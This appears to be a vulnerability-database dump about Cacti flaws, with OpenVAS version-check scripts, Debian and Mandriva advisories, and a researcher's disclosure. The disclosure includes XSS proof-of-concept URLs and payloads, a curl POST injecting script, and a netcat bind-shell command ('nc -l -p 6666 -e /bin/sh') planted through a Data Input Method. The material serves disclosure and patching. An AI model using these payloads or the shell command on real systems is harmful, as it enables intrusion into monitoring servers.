See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: cacti\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://docs.cacti.net/#cross-site_scripting_fixes\nhttp://www.vuxml.org/freebsd/04104985-d846-11de-84e4-00215af774f0.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66300\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-23 20:51:51 +0100 (Mon, 23 Nov 2009)\");\n script_cve_id(\"CVE-2009-4032\");\n script_name(\"FreeBSD Ports: cacti\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"cacti\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.8.7e4\")<0) {\n txt += 'Package cacti version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-04-06T11:39:39", "bulletinFamily": "scanner", "description": "The remote host is missing an update to cacti\nannounced via advisory DSA 1954-1.", "modified": "2018-04-06T00:00:00", "published": "2009-12-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066592", "id": "OPENVAS:136141256231066592", "title": "Debian Security Advisory DSA 1954-1 (cacti)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1954_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1954-1 (cacti)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been found in cacti, a frontend to rrdtool\nfor monitoring systems and services. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2007-3112, CVE-2007-3113\n\nIt was discovered that cacti is prone to a denial of service via the\ngraph_height, graph_width, graph_start and graph_end parameters.\nThis issue only affects the oldstable (etch) version of cacti.\n\nCVE-2009-4032\n\nIt was discovered that cacti is prone to several cross-site scripting\nattacks via different vectors.\n\nCVE-2009-4112\n\nIt has been discovered that cacti allows authenticated administrator\nusers to gain access to the host system by executing arbitrary commands\nvia the Data Input Method for the Linux - Get Memory Usage setting.\n\nThere is no fix for this issue at this stage. Upstream will implement a\nwhitelist policy to only allow certain safe commands. 
For the moment,\nwe recommend that such access is only given to trusted users and that\nthe options Data Input and User Administration are otherwise\ndeactivated.\n\n\nFor the oldstable distribution (etch), these problems have been fixed in\nversion 0.8.6i-3.6.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.8.7b-2.1+lenny1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 0.8.7e-1.1.\n\n\nWe recommend that you upgrade your cacti packages.\";\ntag_summary = \"The remote host is missing an update to cacti\nannounced via advisory DSA 1954-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201954-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66592\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2007-3112\", \"CVE-2007-3113\", \"CVE-2009-4032\", \"CVE-2009-4112\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1954-1 (cacti)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"cacti\", ver:\"0.8.6i-3.6\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cacti\", ver:\"0.8.7b-2.1+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:53", "bulletinFamily": "scanner", "description": "The remote host is missing an update to cacti\nannounced via advisory DSA 1954-1.", "modified": "2017-07-07T00:00:00", "published": "2009-12-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66592", "id": "OPENVAS:66592", "title": "Debian Security Advisory DSA 1954-1 (cacti)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1954_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1954-1 (cacti)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been found in cacti, a frontend to rrdtool\nfor monitoring systems and services. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2007-3112, CVE-2007-3113\n\nIt was discovered that cacti is prone to a denial of service via the\ngraph_height, graph_width, graph_start and graph_end parameters.\nThis issue only affects the oldstable (etch) version of cacti.\n\nCVE-2009-4032\n\nIt was discovered that cacti is prone to several cross-site scripting\nattacks via different vectors.\n\nCVE-2009-4112\n\nIt has been discovered that cacti allows authenticated administrator\nusers to gain access to the host system by executing arbitrary commands\nvia the Data Input Method for the Linux - Get Memory Usage setting.\n\nThere is no fix for this issue at this stage. Upstream will implement a\nwhitelist policy to only allow certain safe commands. 
For the moment,\nwe recommend that such access is only given to trusted users and that\nthe options Data Input and User Administration are otherwise\ndeactivated.\n\n\nFor the oldstable distribution (etch), these problems have been fixed in\nversion 0.8.6i-3.6.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.8.7b-2.1+lenny1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 0.8.7e-1.1.\n\n\nWe recommend that you upgrade your cacti packages.\";\ntag_summary = \"The remote host is missing an update to cacti\nannounced via advisory DSA 1954-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201954-1\";\n\n\nif(description)\n{\n script_id(66592);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2007-3112\", \"CVE-2007-3113\", \"CVE-2009-4032\", \"CVE-2009-4112\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1954-1 (cacti)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"cacti\", ver:\"0.8.6i-3.6\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cacti\", ver:\"0.8.7b-2.1+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:40", "bulletinFamily": "scanner", "description": "Check for the Version of cacti", "modified": "2017-12-25T00:00:00", "published": "2010-08-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831138", "id": "OPENVAS:1361412562310831138", "title": "Mandriva Update for cacti MDVSA-2010:160 (cacti)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for cacti MDVSA-2010:160 (cacti)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the 
hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been found and corrected in cacti:\n\n Multiple cross-site scripting (XSS) vulnerabilities in Cacti before\n 0.8.7f, allow remote attackers to inject arbitrary web script or\n HTML via the (1) hostname or (2) description parameter to host.php,\n or (3) the host_id parameter to data_sources.php (CVE-2010-1644).\n\n Cacti before 0.8.7f, allows remote authenticated administrators to\n execute arbitrary commands via shell metacharacters in (1) the FQDN\n field of a Device or (2) the Vertical Label field of a Graph Template\n (CVE-2010-1645).\n\n Cross-site scripting (XSS) vulnerability in\n include/top_graph_header.php in Cacti before 0.8.7g allows remote\n attackers to inject arbitrary web script or HTML via the graph_start\n parameter to graph.php. 
NOTE: this vulnerability exists because of\n an incorrect fix for CVE-2009-4032.2.b (CVE-2010-2543).\n\n Cross-site scripting (XSS) vulnerability in utilities.php in Cacti\n before 0.8.7g, allows remote attackers to inject arbitrary web script\n or HTML via the filter parameter (CVE-2010-2544).\n\n Multiple cross-site scripting (XSS) vulnerabilities in Cacti before\n 0.8.7g, allow remote attackers to inject arbitrary web script or HTML\n via (1) the name element in an XML template to templates_import.php;\n and allow remote authenticated administrators to inject arbitrary web\n script or HTML via vectors related to (2) cdef.php, (3) data_input.php,\n (4) data_queries.php, (5) data_sources.php, (6) data_templates.php, (7)\n gprint_presets.php, (8) graph.php, (9) graphs_new.php, (10) graphs.php,\n (11) graph_templates_inputs.php, (12) graph_templates_items.php,\n (13) graph_templates.php, (14) graph_view.php, (15) host.php, (16)\n host_templates.php, (17) lib/functions.php, (18) lib/html_form.php,\n (19) lib/html_form_template.php, (20) lib/html.php, (21)\n lib/html_tree.php, (22) lib/rrd.php, (23) rra.php, (24) tree.php,\n and (25) user_admin.php (CVE-2010-2545).\n\n This update provides cacti 0.8.7f, which is not vulnerable to these\n issues.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"cacti on Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-08/msg00021.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831138\");\n script_version(\"$Revision: 8244 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-25 08:29:28 +0100 (Mon, 25 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-08-30 16:59:25 +0200 (Mon, 30 Aug 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_xref(name: 
\"MDVSA\", value: \"2010:160\");\n script_cve_id(\"CVE-2010-1644\", \"CVE-2010-1645\", \"CVE-2009-4032\", \"CVE-2010-2543\", \"CVE-2010-2544\", \"CVE-2010-2545\");\n script_name(\"Mandriva Update for cacti MDVSA-2010:160 (cacti)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of cacti\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"cacti\", rpm:\"cacti~0.8.7g~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\nCacti 0.8.7e and earlier versions are affected by multiple security\r\nissues. Issues 1-4 are cross site scripting issues, issue 5 is a\r\npriviledge escalation issue.\r\n\r\n\r\n\r\n\r\n1. 
XSS 1\r\n\r\nA HTTP GET request against the following URL will, on a web browser\r\nwith Javascript support, cause a dialog box saying '1' to be displayed:\r\n\r\nhttp://CACTIHOST/graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility:hidden%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx%20y=%27\r\n\r\nThis vulnerability is only exploitable if the victim is allowed to view\r\ngraphs. This will be true if the victim has previously authenticated\r\nagainst Cacti or if both the guest user has been activated (default:\r\ndisabled) and the graph view permission was set to 'guest' (default:\r\n'No User').\r\n\r\nThis vulnerability was tested with Firefox 3.0.6.\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n2. XSS 2\r\n\r\nThe following curl invocation will generate a HTTP POST request\r\nagainst\r\n\r\nhttp://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true\r\n\r\nwith an 'application/x-www-form-urlencoded' content type HTTP body part\r\ncontaining\r\n date1=%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3Cx+y%3D%27'\r\nCurl will write the resulting output to a file named poc.html.\r\n\r\n> curl -d 'date1=%27%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E%3Cx+y%3D%27' 'http://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true' > poc.html\r\n\r\nWhen this file is loaded and rendered by a web browser with Javascript\r\nsupport, this will cause a dialog box saying '2' to be displayed.\r\n\r\nThis vulnerability is only exploitable if the victim is allowed to view\r\ngraphs. 
This will be true if the victim has previously authenticated\r\nagainst Cacti or if both the guest user has been activated (default:\r\ndisabled) and the graph view permission was set to 'guest' (default:\r\n'No User').\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n3. XSS 3\r\n\r\nIf an attacker or the victim has permission to modify the graph\r\ndisplay settings via graph_settings.php, the attacker is able to\r\npersistently inject javascript code via the 'page_refresh' and\r\n'default_dual_pane_width' parameters.\r\n\r\nSetting 'page_refresh' to the following value will, on any consecutive\r\nvisitors' web browser with Javascript support, cause a dialog box saying\r\n'3' to be displayed:\r\n 300'><script>alert(3)</script><x y='\r\n\r\nSetting 'default_dual_pane_width' to the following value will, on any\r\nconsecutive visitors' web browser with Javascript support, cause a\r\ndialog box saying '3' to be displayed:\r\n 200\"><script>alert(3)</script><x y=\"\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n4. XSS 4\r\n\r\nA HTTP GET request against the following URL will, on a web browser\r\nwith Javascript support, cause a dialog box saying '4' to be displayed:\r\n\r\n> >\r\nhttp://CACTIHOST/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E\r\n\r\nThis vulnerability is only exploitable if the victim is allowed to view\r\ngraphs. 
This will be true if the victim has previously authenticated\r\nagainst Cacti or if both the guest user has been activated (default:\r\ndisabled) and the graph view permission was set to 'guest' (default:\r\n'No User').\r\n\r\nAlternatively, a similar injection can be achieved, if an attacker or\r\nhis victim has permission to modify the graph display settings via\r\ngraph_settings.php. If so, the attacker is able to persistently inject\r\njavascript code via the 'title_size', 'legend_size', 'axis_size' and\r\n'unit_size' parameters.\r\n\r\nSetting any of these parameters to the following value will, on any\r\nconsecutive visitors' web browser with Javascript support, cause a\r\ndialog box saying '4' to be displayed:\r\n 8</pre><script>alert(4)</script><pre>\r\n\r\nThis vulnerability was tested with Firefox 3.0.6\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n5. Priviledge escalation\r\n\r\nFinally, due to the permissive way the web interface allows Cacti\r\nto be configured, a cacti administrator is also able to execute\r\narbitrary commands on the system as the user the Cacti polling mechanism\r\n runs as (usually a non-priviledged user).\r\n\r\nFor example, it is possible to successfully spawn (and connect to) a\r\nbackdoor/remote shell on the Cacti system by changing the \"Data Input\r\nMethod\" for \"Linux - Get Memory Usage\". Setting \"Input String\" to\r\n nohup nc -l -p 6666 -n -e /bin/sh &\r\nwould spawn a remotely accessible shell whenever this handler was called\r\n(every couple of minutes by default on my Debian test system).\r\n\r\nCacti developers say:\r\n> There is no effective way to fix the data input method without breaking Cacti. 
It will be reviewed for the release of 0.8.8.\r\n\r\n\r\n\r\nThe XSS issues are currently tracked as CVE-2009-4032 (additional CVEs\r\nmay or may not be assigned), issue 5 has not been tracked so far (to my\r\nknowledge).\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEAREKAAYFAksOFWYACgkQn6GkvSd/Bgwb0QCfZu7dWpBE7FSeds0jeFa1NmzN\r\nq44An3dl2cZgU/LRpZSjYpuqbo2Ukzbe\r\n=yeNz\r\n-----END PGP SIGNATURE-----", "modified": "2009-12-01T00:00:00", "published": "2009-12-01T00:00:00", "id": "SECURITYVULNS:DOC:22850", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22850", "title": "Cacti 0.8.7e: Multiple security issues", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1954-1 security@debian.org\r\nhttp://www.debian.org/security/ Steffen Joeris\r\nDecember 16, 2009 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : cacti \r\nVulnerability : insufficient input sanitising \r\nProblem type : remote \r\nDebian-specific: no \r\nCVE Ids : CVE-2007-3112 CVE-2007-3113 CVE-2009-4032 \r\nDebian Bugs : 429224 \r\n\r\nSeveral vulnerabilities have been found in cacti, a frontend to rrdtool\r\nfor monitoring systems and services. 
The Common Vulnerabilities and\r\nExposures project identifies the following problems:\r\n\r\nCVE-2007-3112, CVE-2007-3113\r\n\r\nIt was discovered that cacti is prone to a denial of service via the\r\ngraph_height, graph_width, graph_start and graph_end parameters.\r\nThis issue only affects the oldstable (etch) version of cacti.\r\n\r\nCVE-2009-4032\r\n\r\nIt was discovered that cacti is prone to several cross-site scripting\r\nattacks via different vectors.\r\n\r\nCVE-2009-4112\r\n\r\nIt has been discovered that cacti allows authenticated administrator\r\nusers to gain access to the host system by executing arbitrary commands\r\nvia the \"Data Input Method\" for the \"Linux - Get Memory Usage\" setting.\r\n\r\nThere is no fix for this issue at this stage. Upstream will implement a\r\nwhitelist policy to only allow certain \"safe\" commands. For the moment,\r\nwe recommend that such access is only given to trusted users and that\r\nthe options \"Data Input\" and \"User Administration\" are otherwise\r\ndeactivated.\r\n\r\n\r\nFor the oldstable distribution (etch), these problems have been fixed in\r\nversion 0.8.6i-3.6.\r\n\r\nFor the stable distribution (lenny), this problem has been fixed in\r\nversion 0.8.7b-2.1+lenny1.\r\n\r\nFor the testing distribution (squeeze), this problem will be fixed soon.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 0.8.7e-1.1.\r\n\r\n\r\nWe recommend that you upgrade your cacti packages.\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 4.0 
alias etch\r\n- -------------------------------\r\n\r\nDebian (oldstable)\r\n- ------------------\r\n\r\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i.orig.tar.gz\r\n Size/MD5 checksum: 1122700 341b5828d95db91f81f5fbba65411d63\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6.diff.gz\r\n Size/MD5 checksum: 38419 4ee9e373817ebc32297e1c3de8fee10d\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6.dsc\r\n Size/MD5 checksum: 590 bb8fb25c6db1cd6a2a785f879943d969\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6_all.deb\r\n Size/MD5 checksum: 962816 9093e9f9abaa6c3dbbedad24cc1d4f7e\r\n\r\n\r\nDebian GNU/Linux 5.0 alias lenny\r\n- --------------------------------\r\n\r\nDebian (stable)\r\n- ---------------\r\n\r\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b.orig.tar.gz\r\n Size/MD5 checksum: 1972444 aa8a740a6ab88e3634b546c3e1bc502f\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1.diff.gz\r\n Size/MD5 checksum: 37232 04459452593e23c5e837920cfd0f1789\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1.dsc\r\n Size/MD5 checksum: 1117 d67349656ce9514266e7d5d2f378a219\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1_all.deb\r\n Size/MD5 checksum: 1847182 3876f128fdcc2aefa63d65531875d2ab\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb 
http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAksoyH0ACgkQ62zWxYk/rQfXGwCeKMeQqicZ/LayzFqXznC2W0is\r\nEG8AoLUxcdouXG/aTvqnfKJyWZtpA9TM\r\n=CLbl\r\n-----END PGP SIGNATURE-----", "modified": "2009-12-16T00:00:00", "published": "2009-12-16T00:00:00", "id": "SECURITYVULNS:DOC:22951", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22951", "title": "[SECURITY] [DSA 1954-1] New cacti packages fix insufficient input sanitising", "type": "securityvulns", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-11-01T02:26:40", "bulletinFamily": "scanner", "description": "This fix contains several official patches from cacti: Command Line\nAdd Graphs Syntax SNMP Invalid Responses Template Import/Export\nDuplication Cross-Site Scripting Fixes\nhttp://www.cacti.net/download_patches.php\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
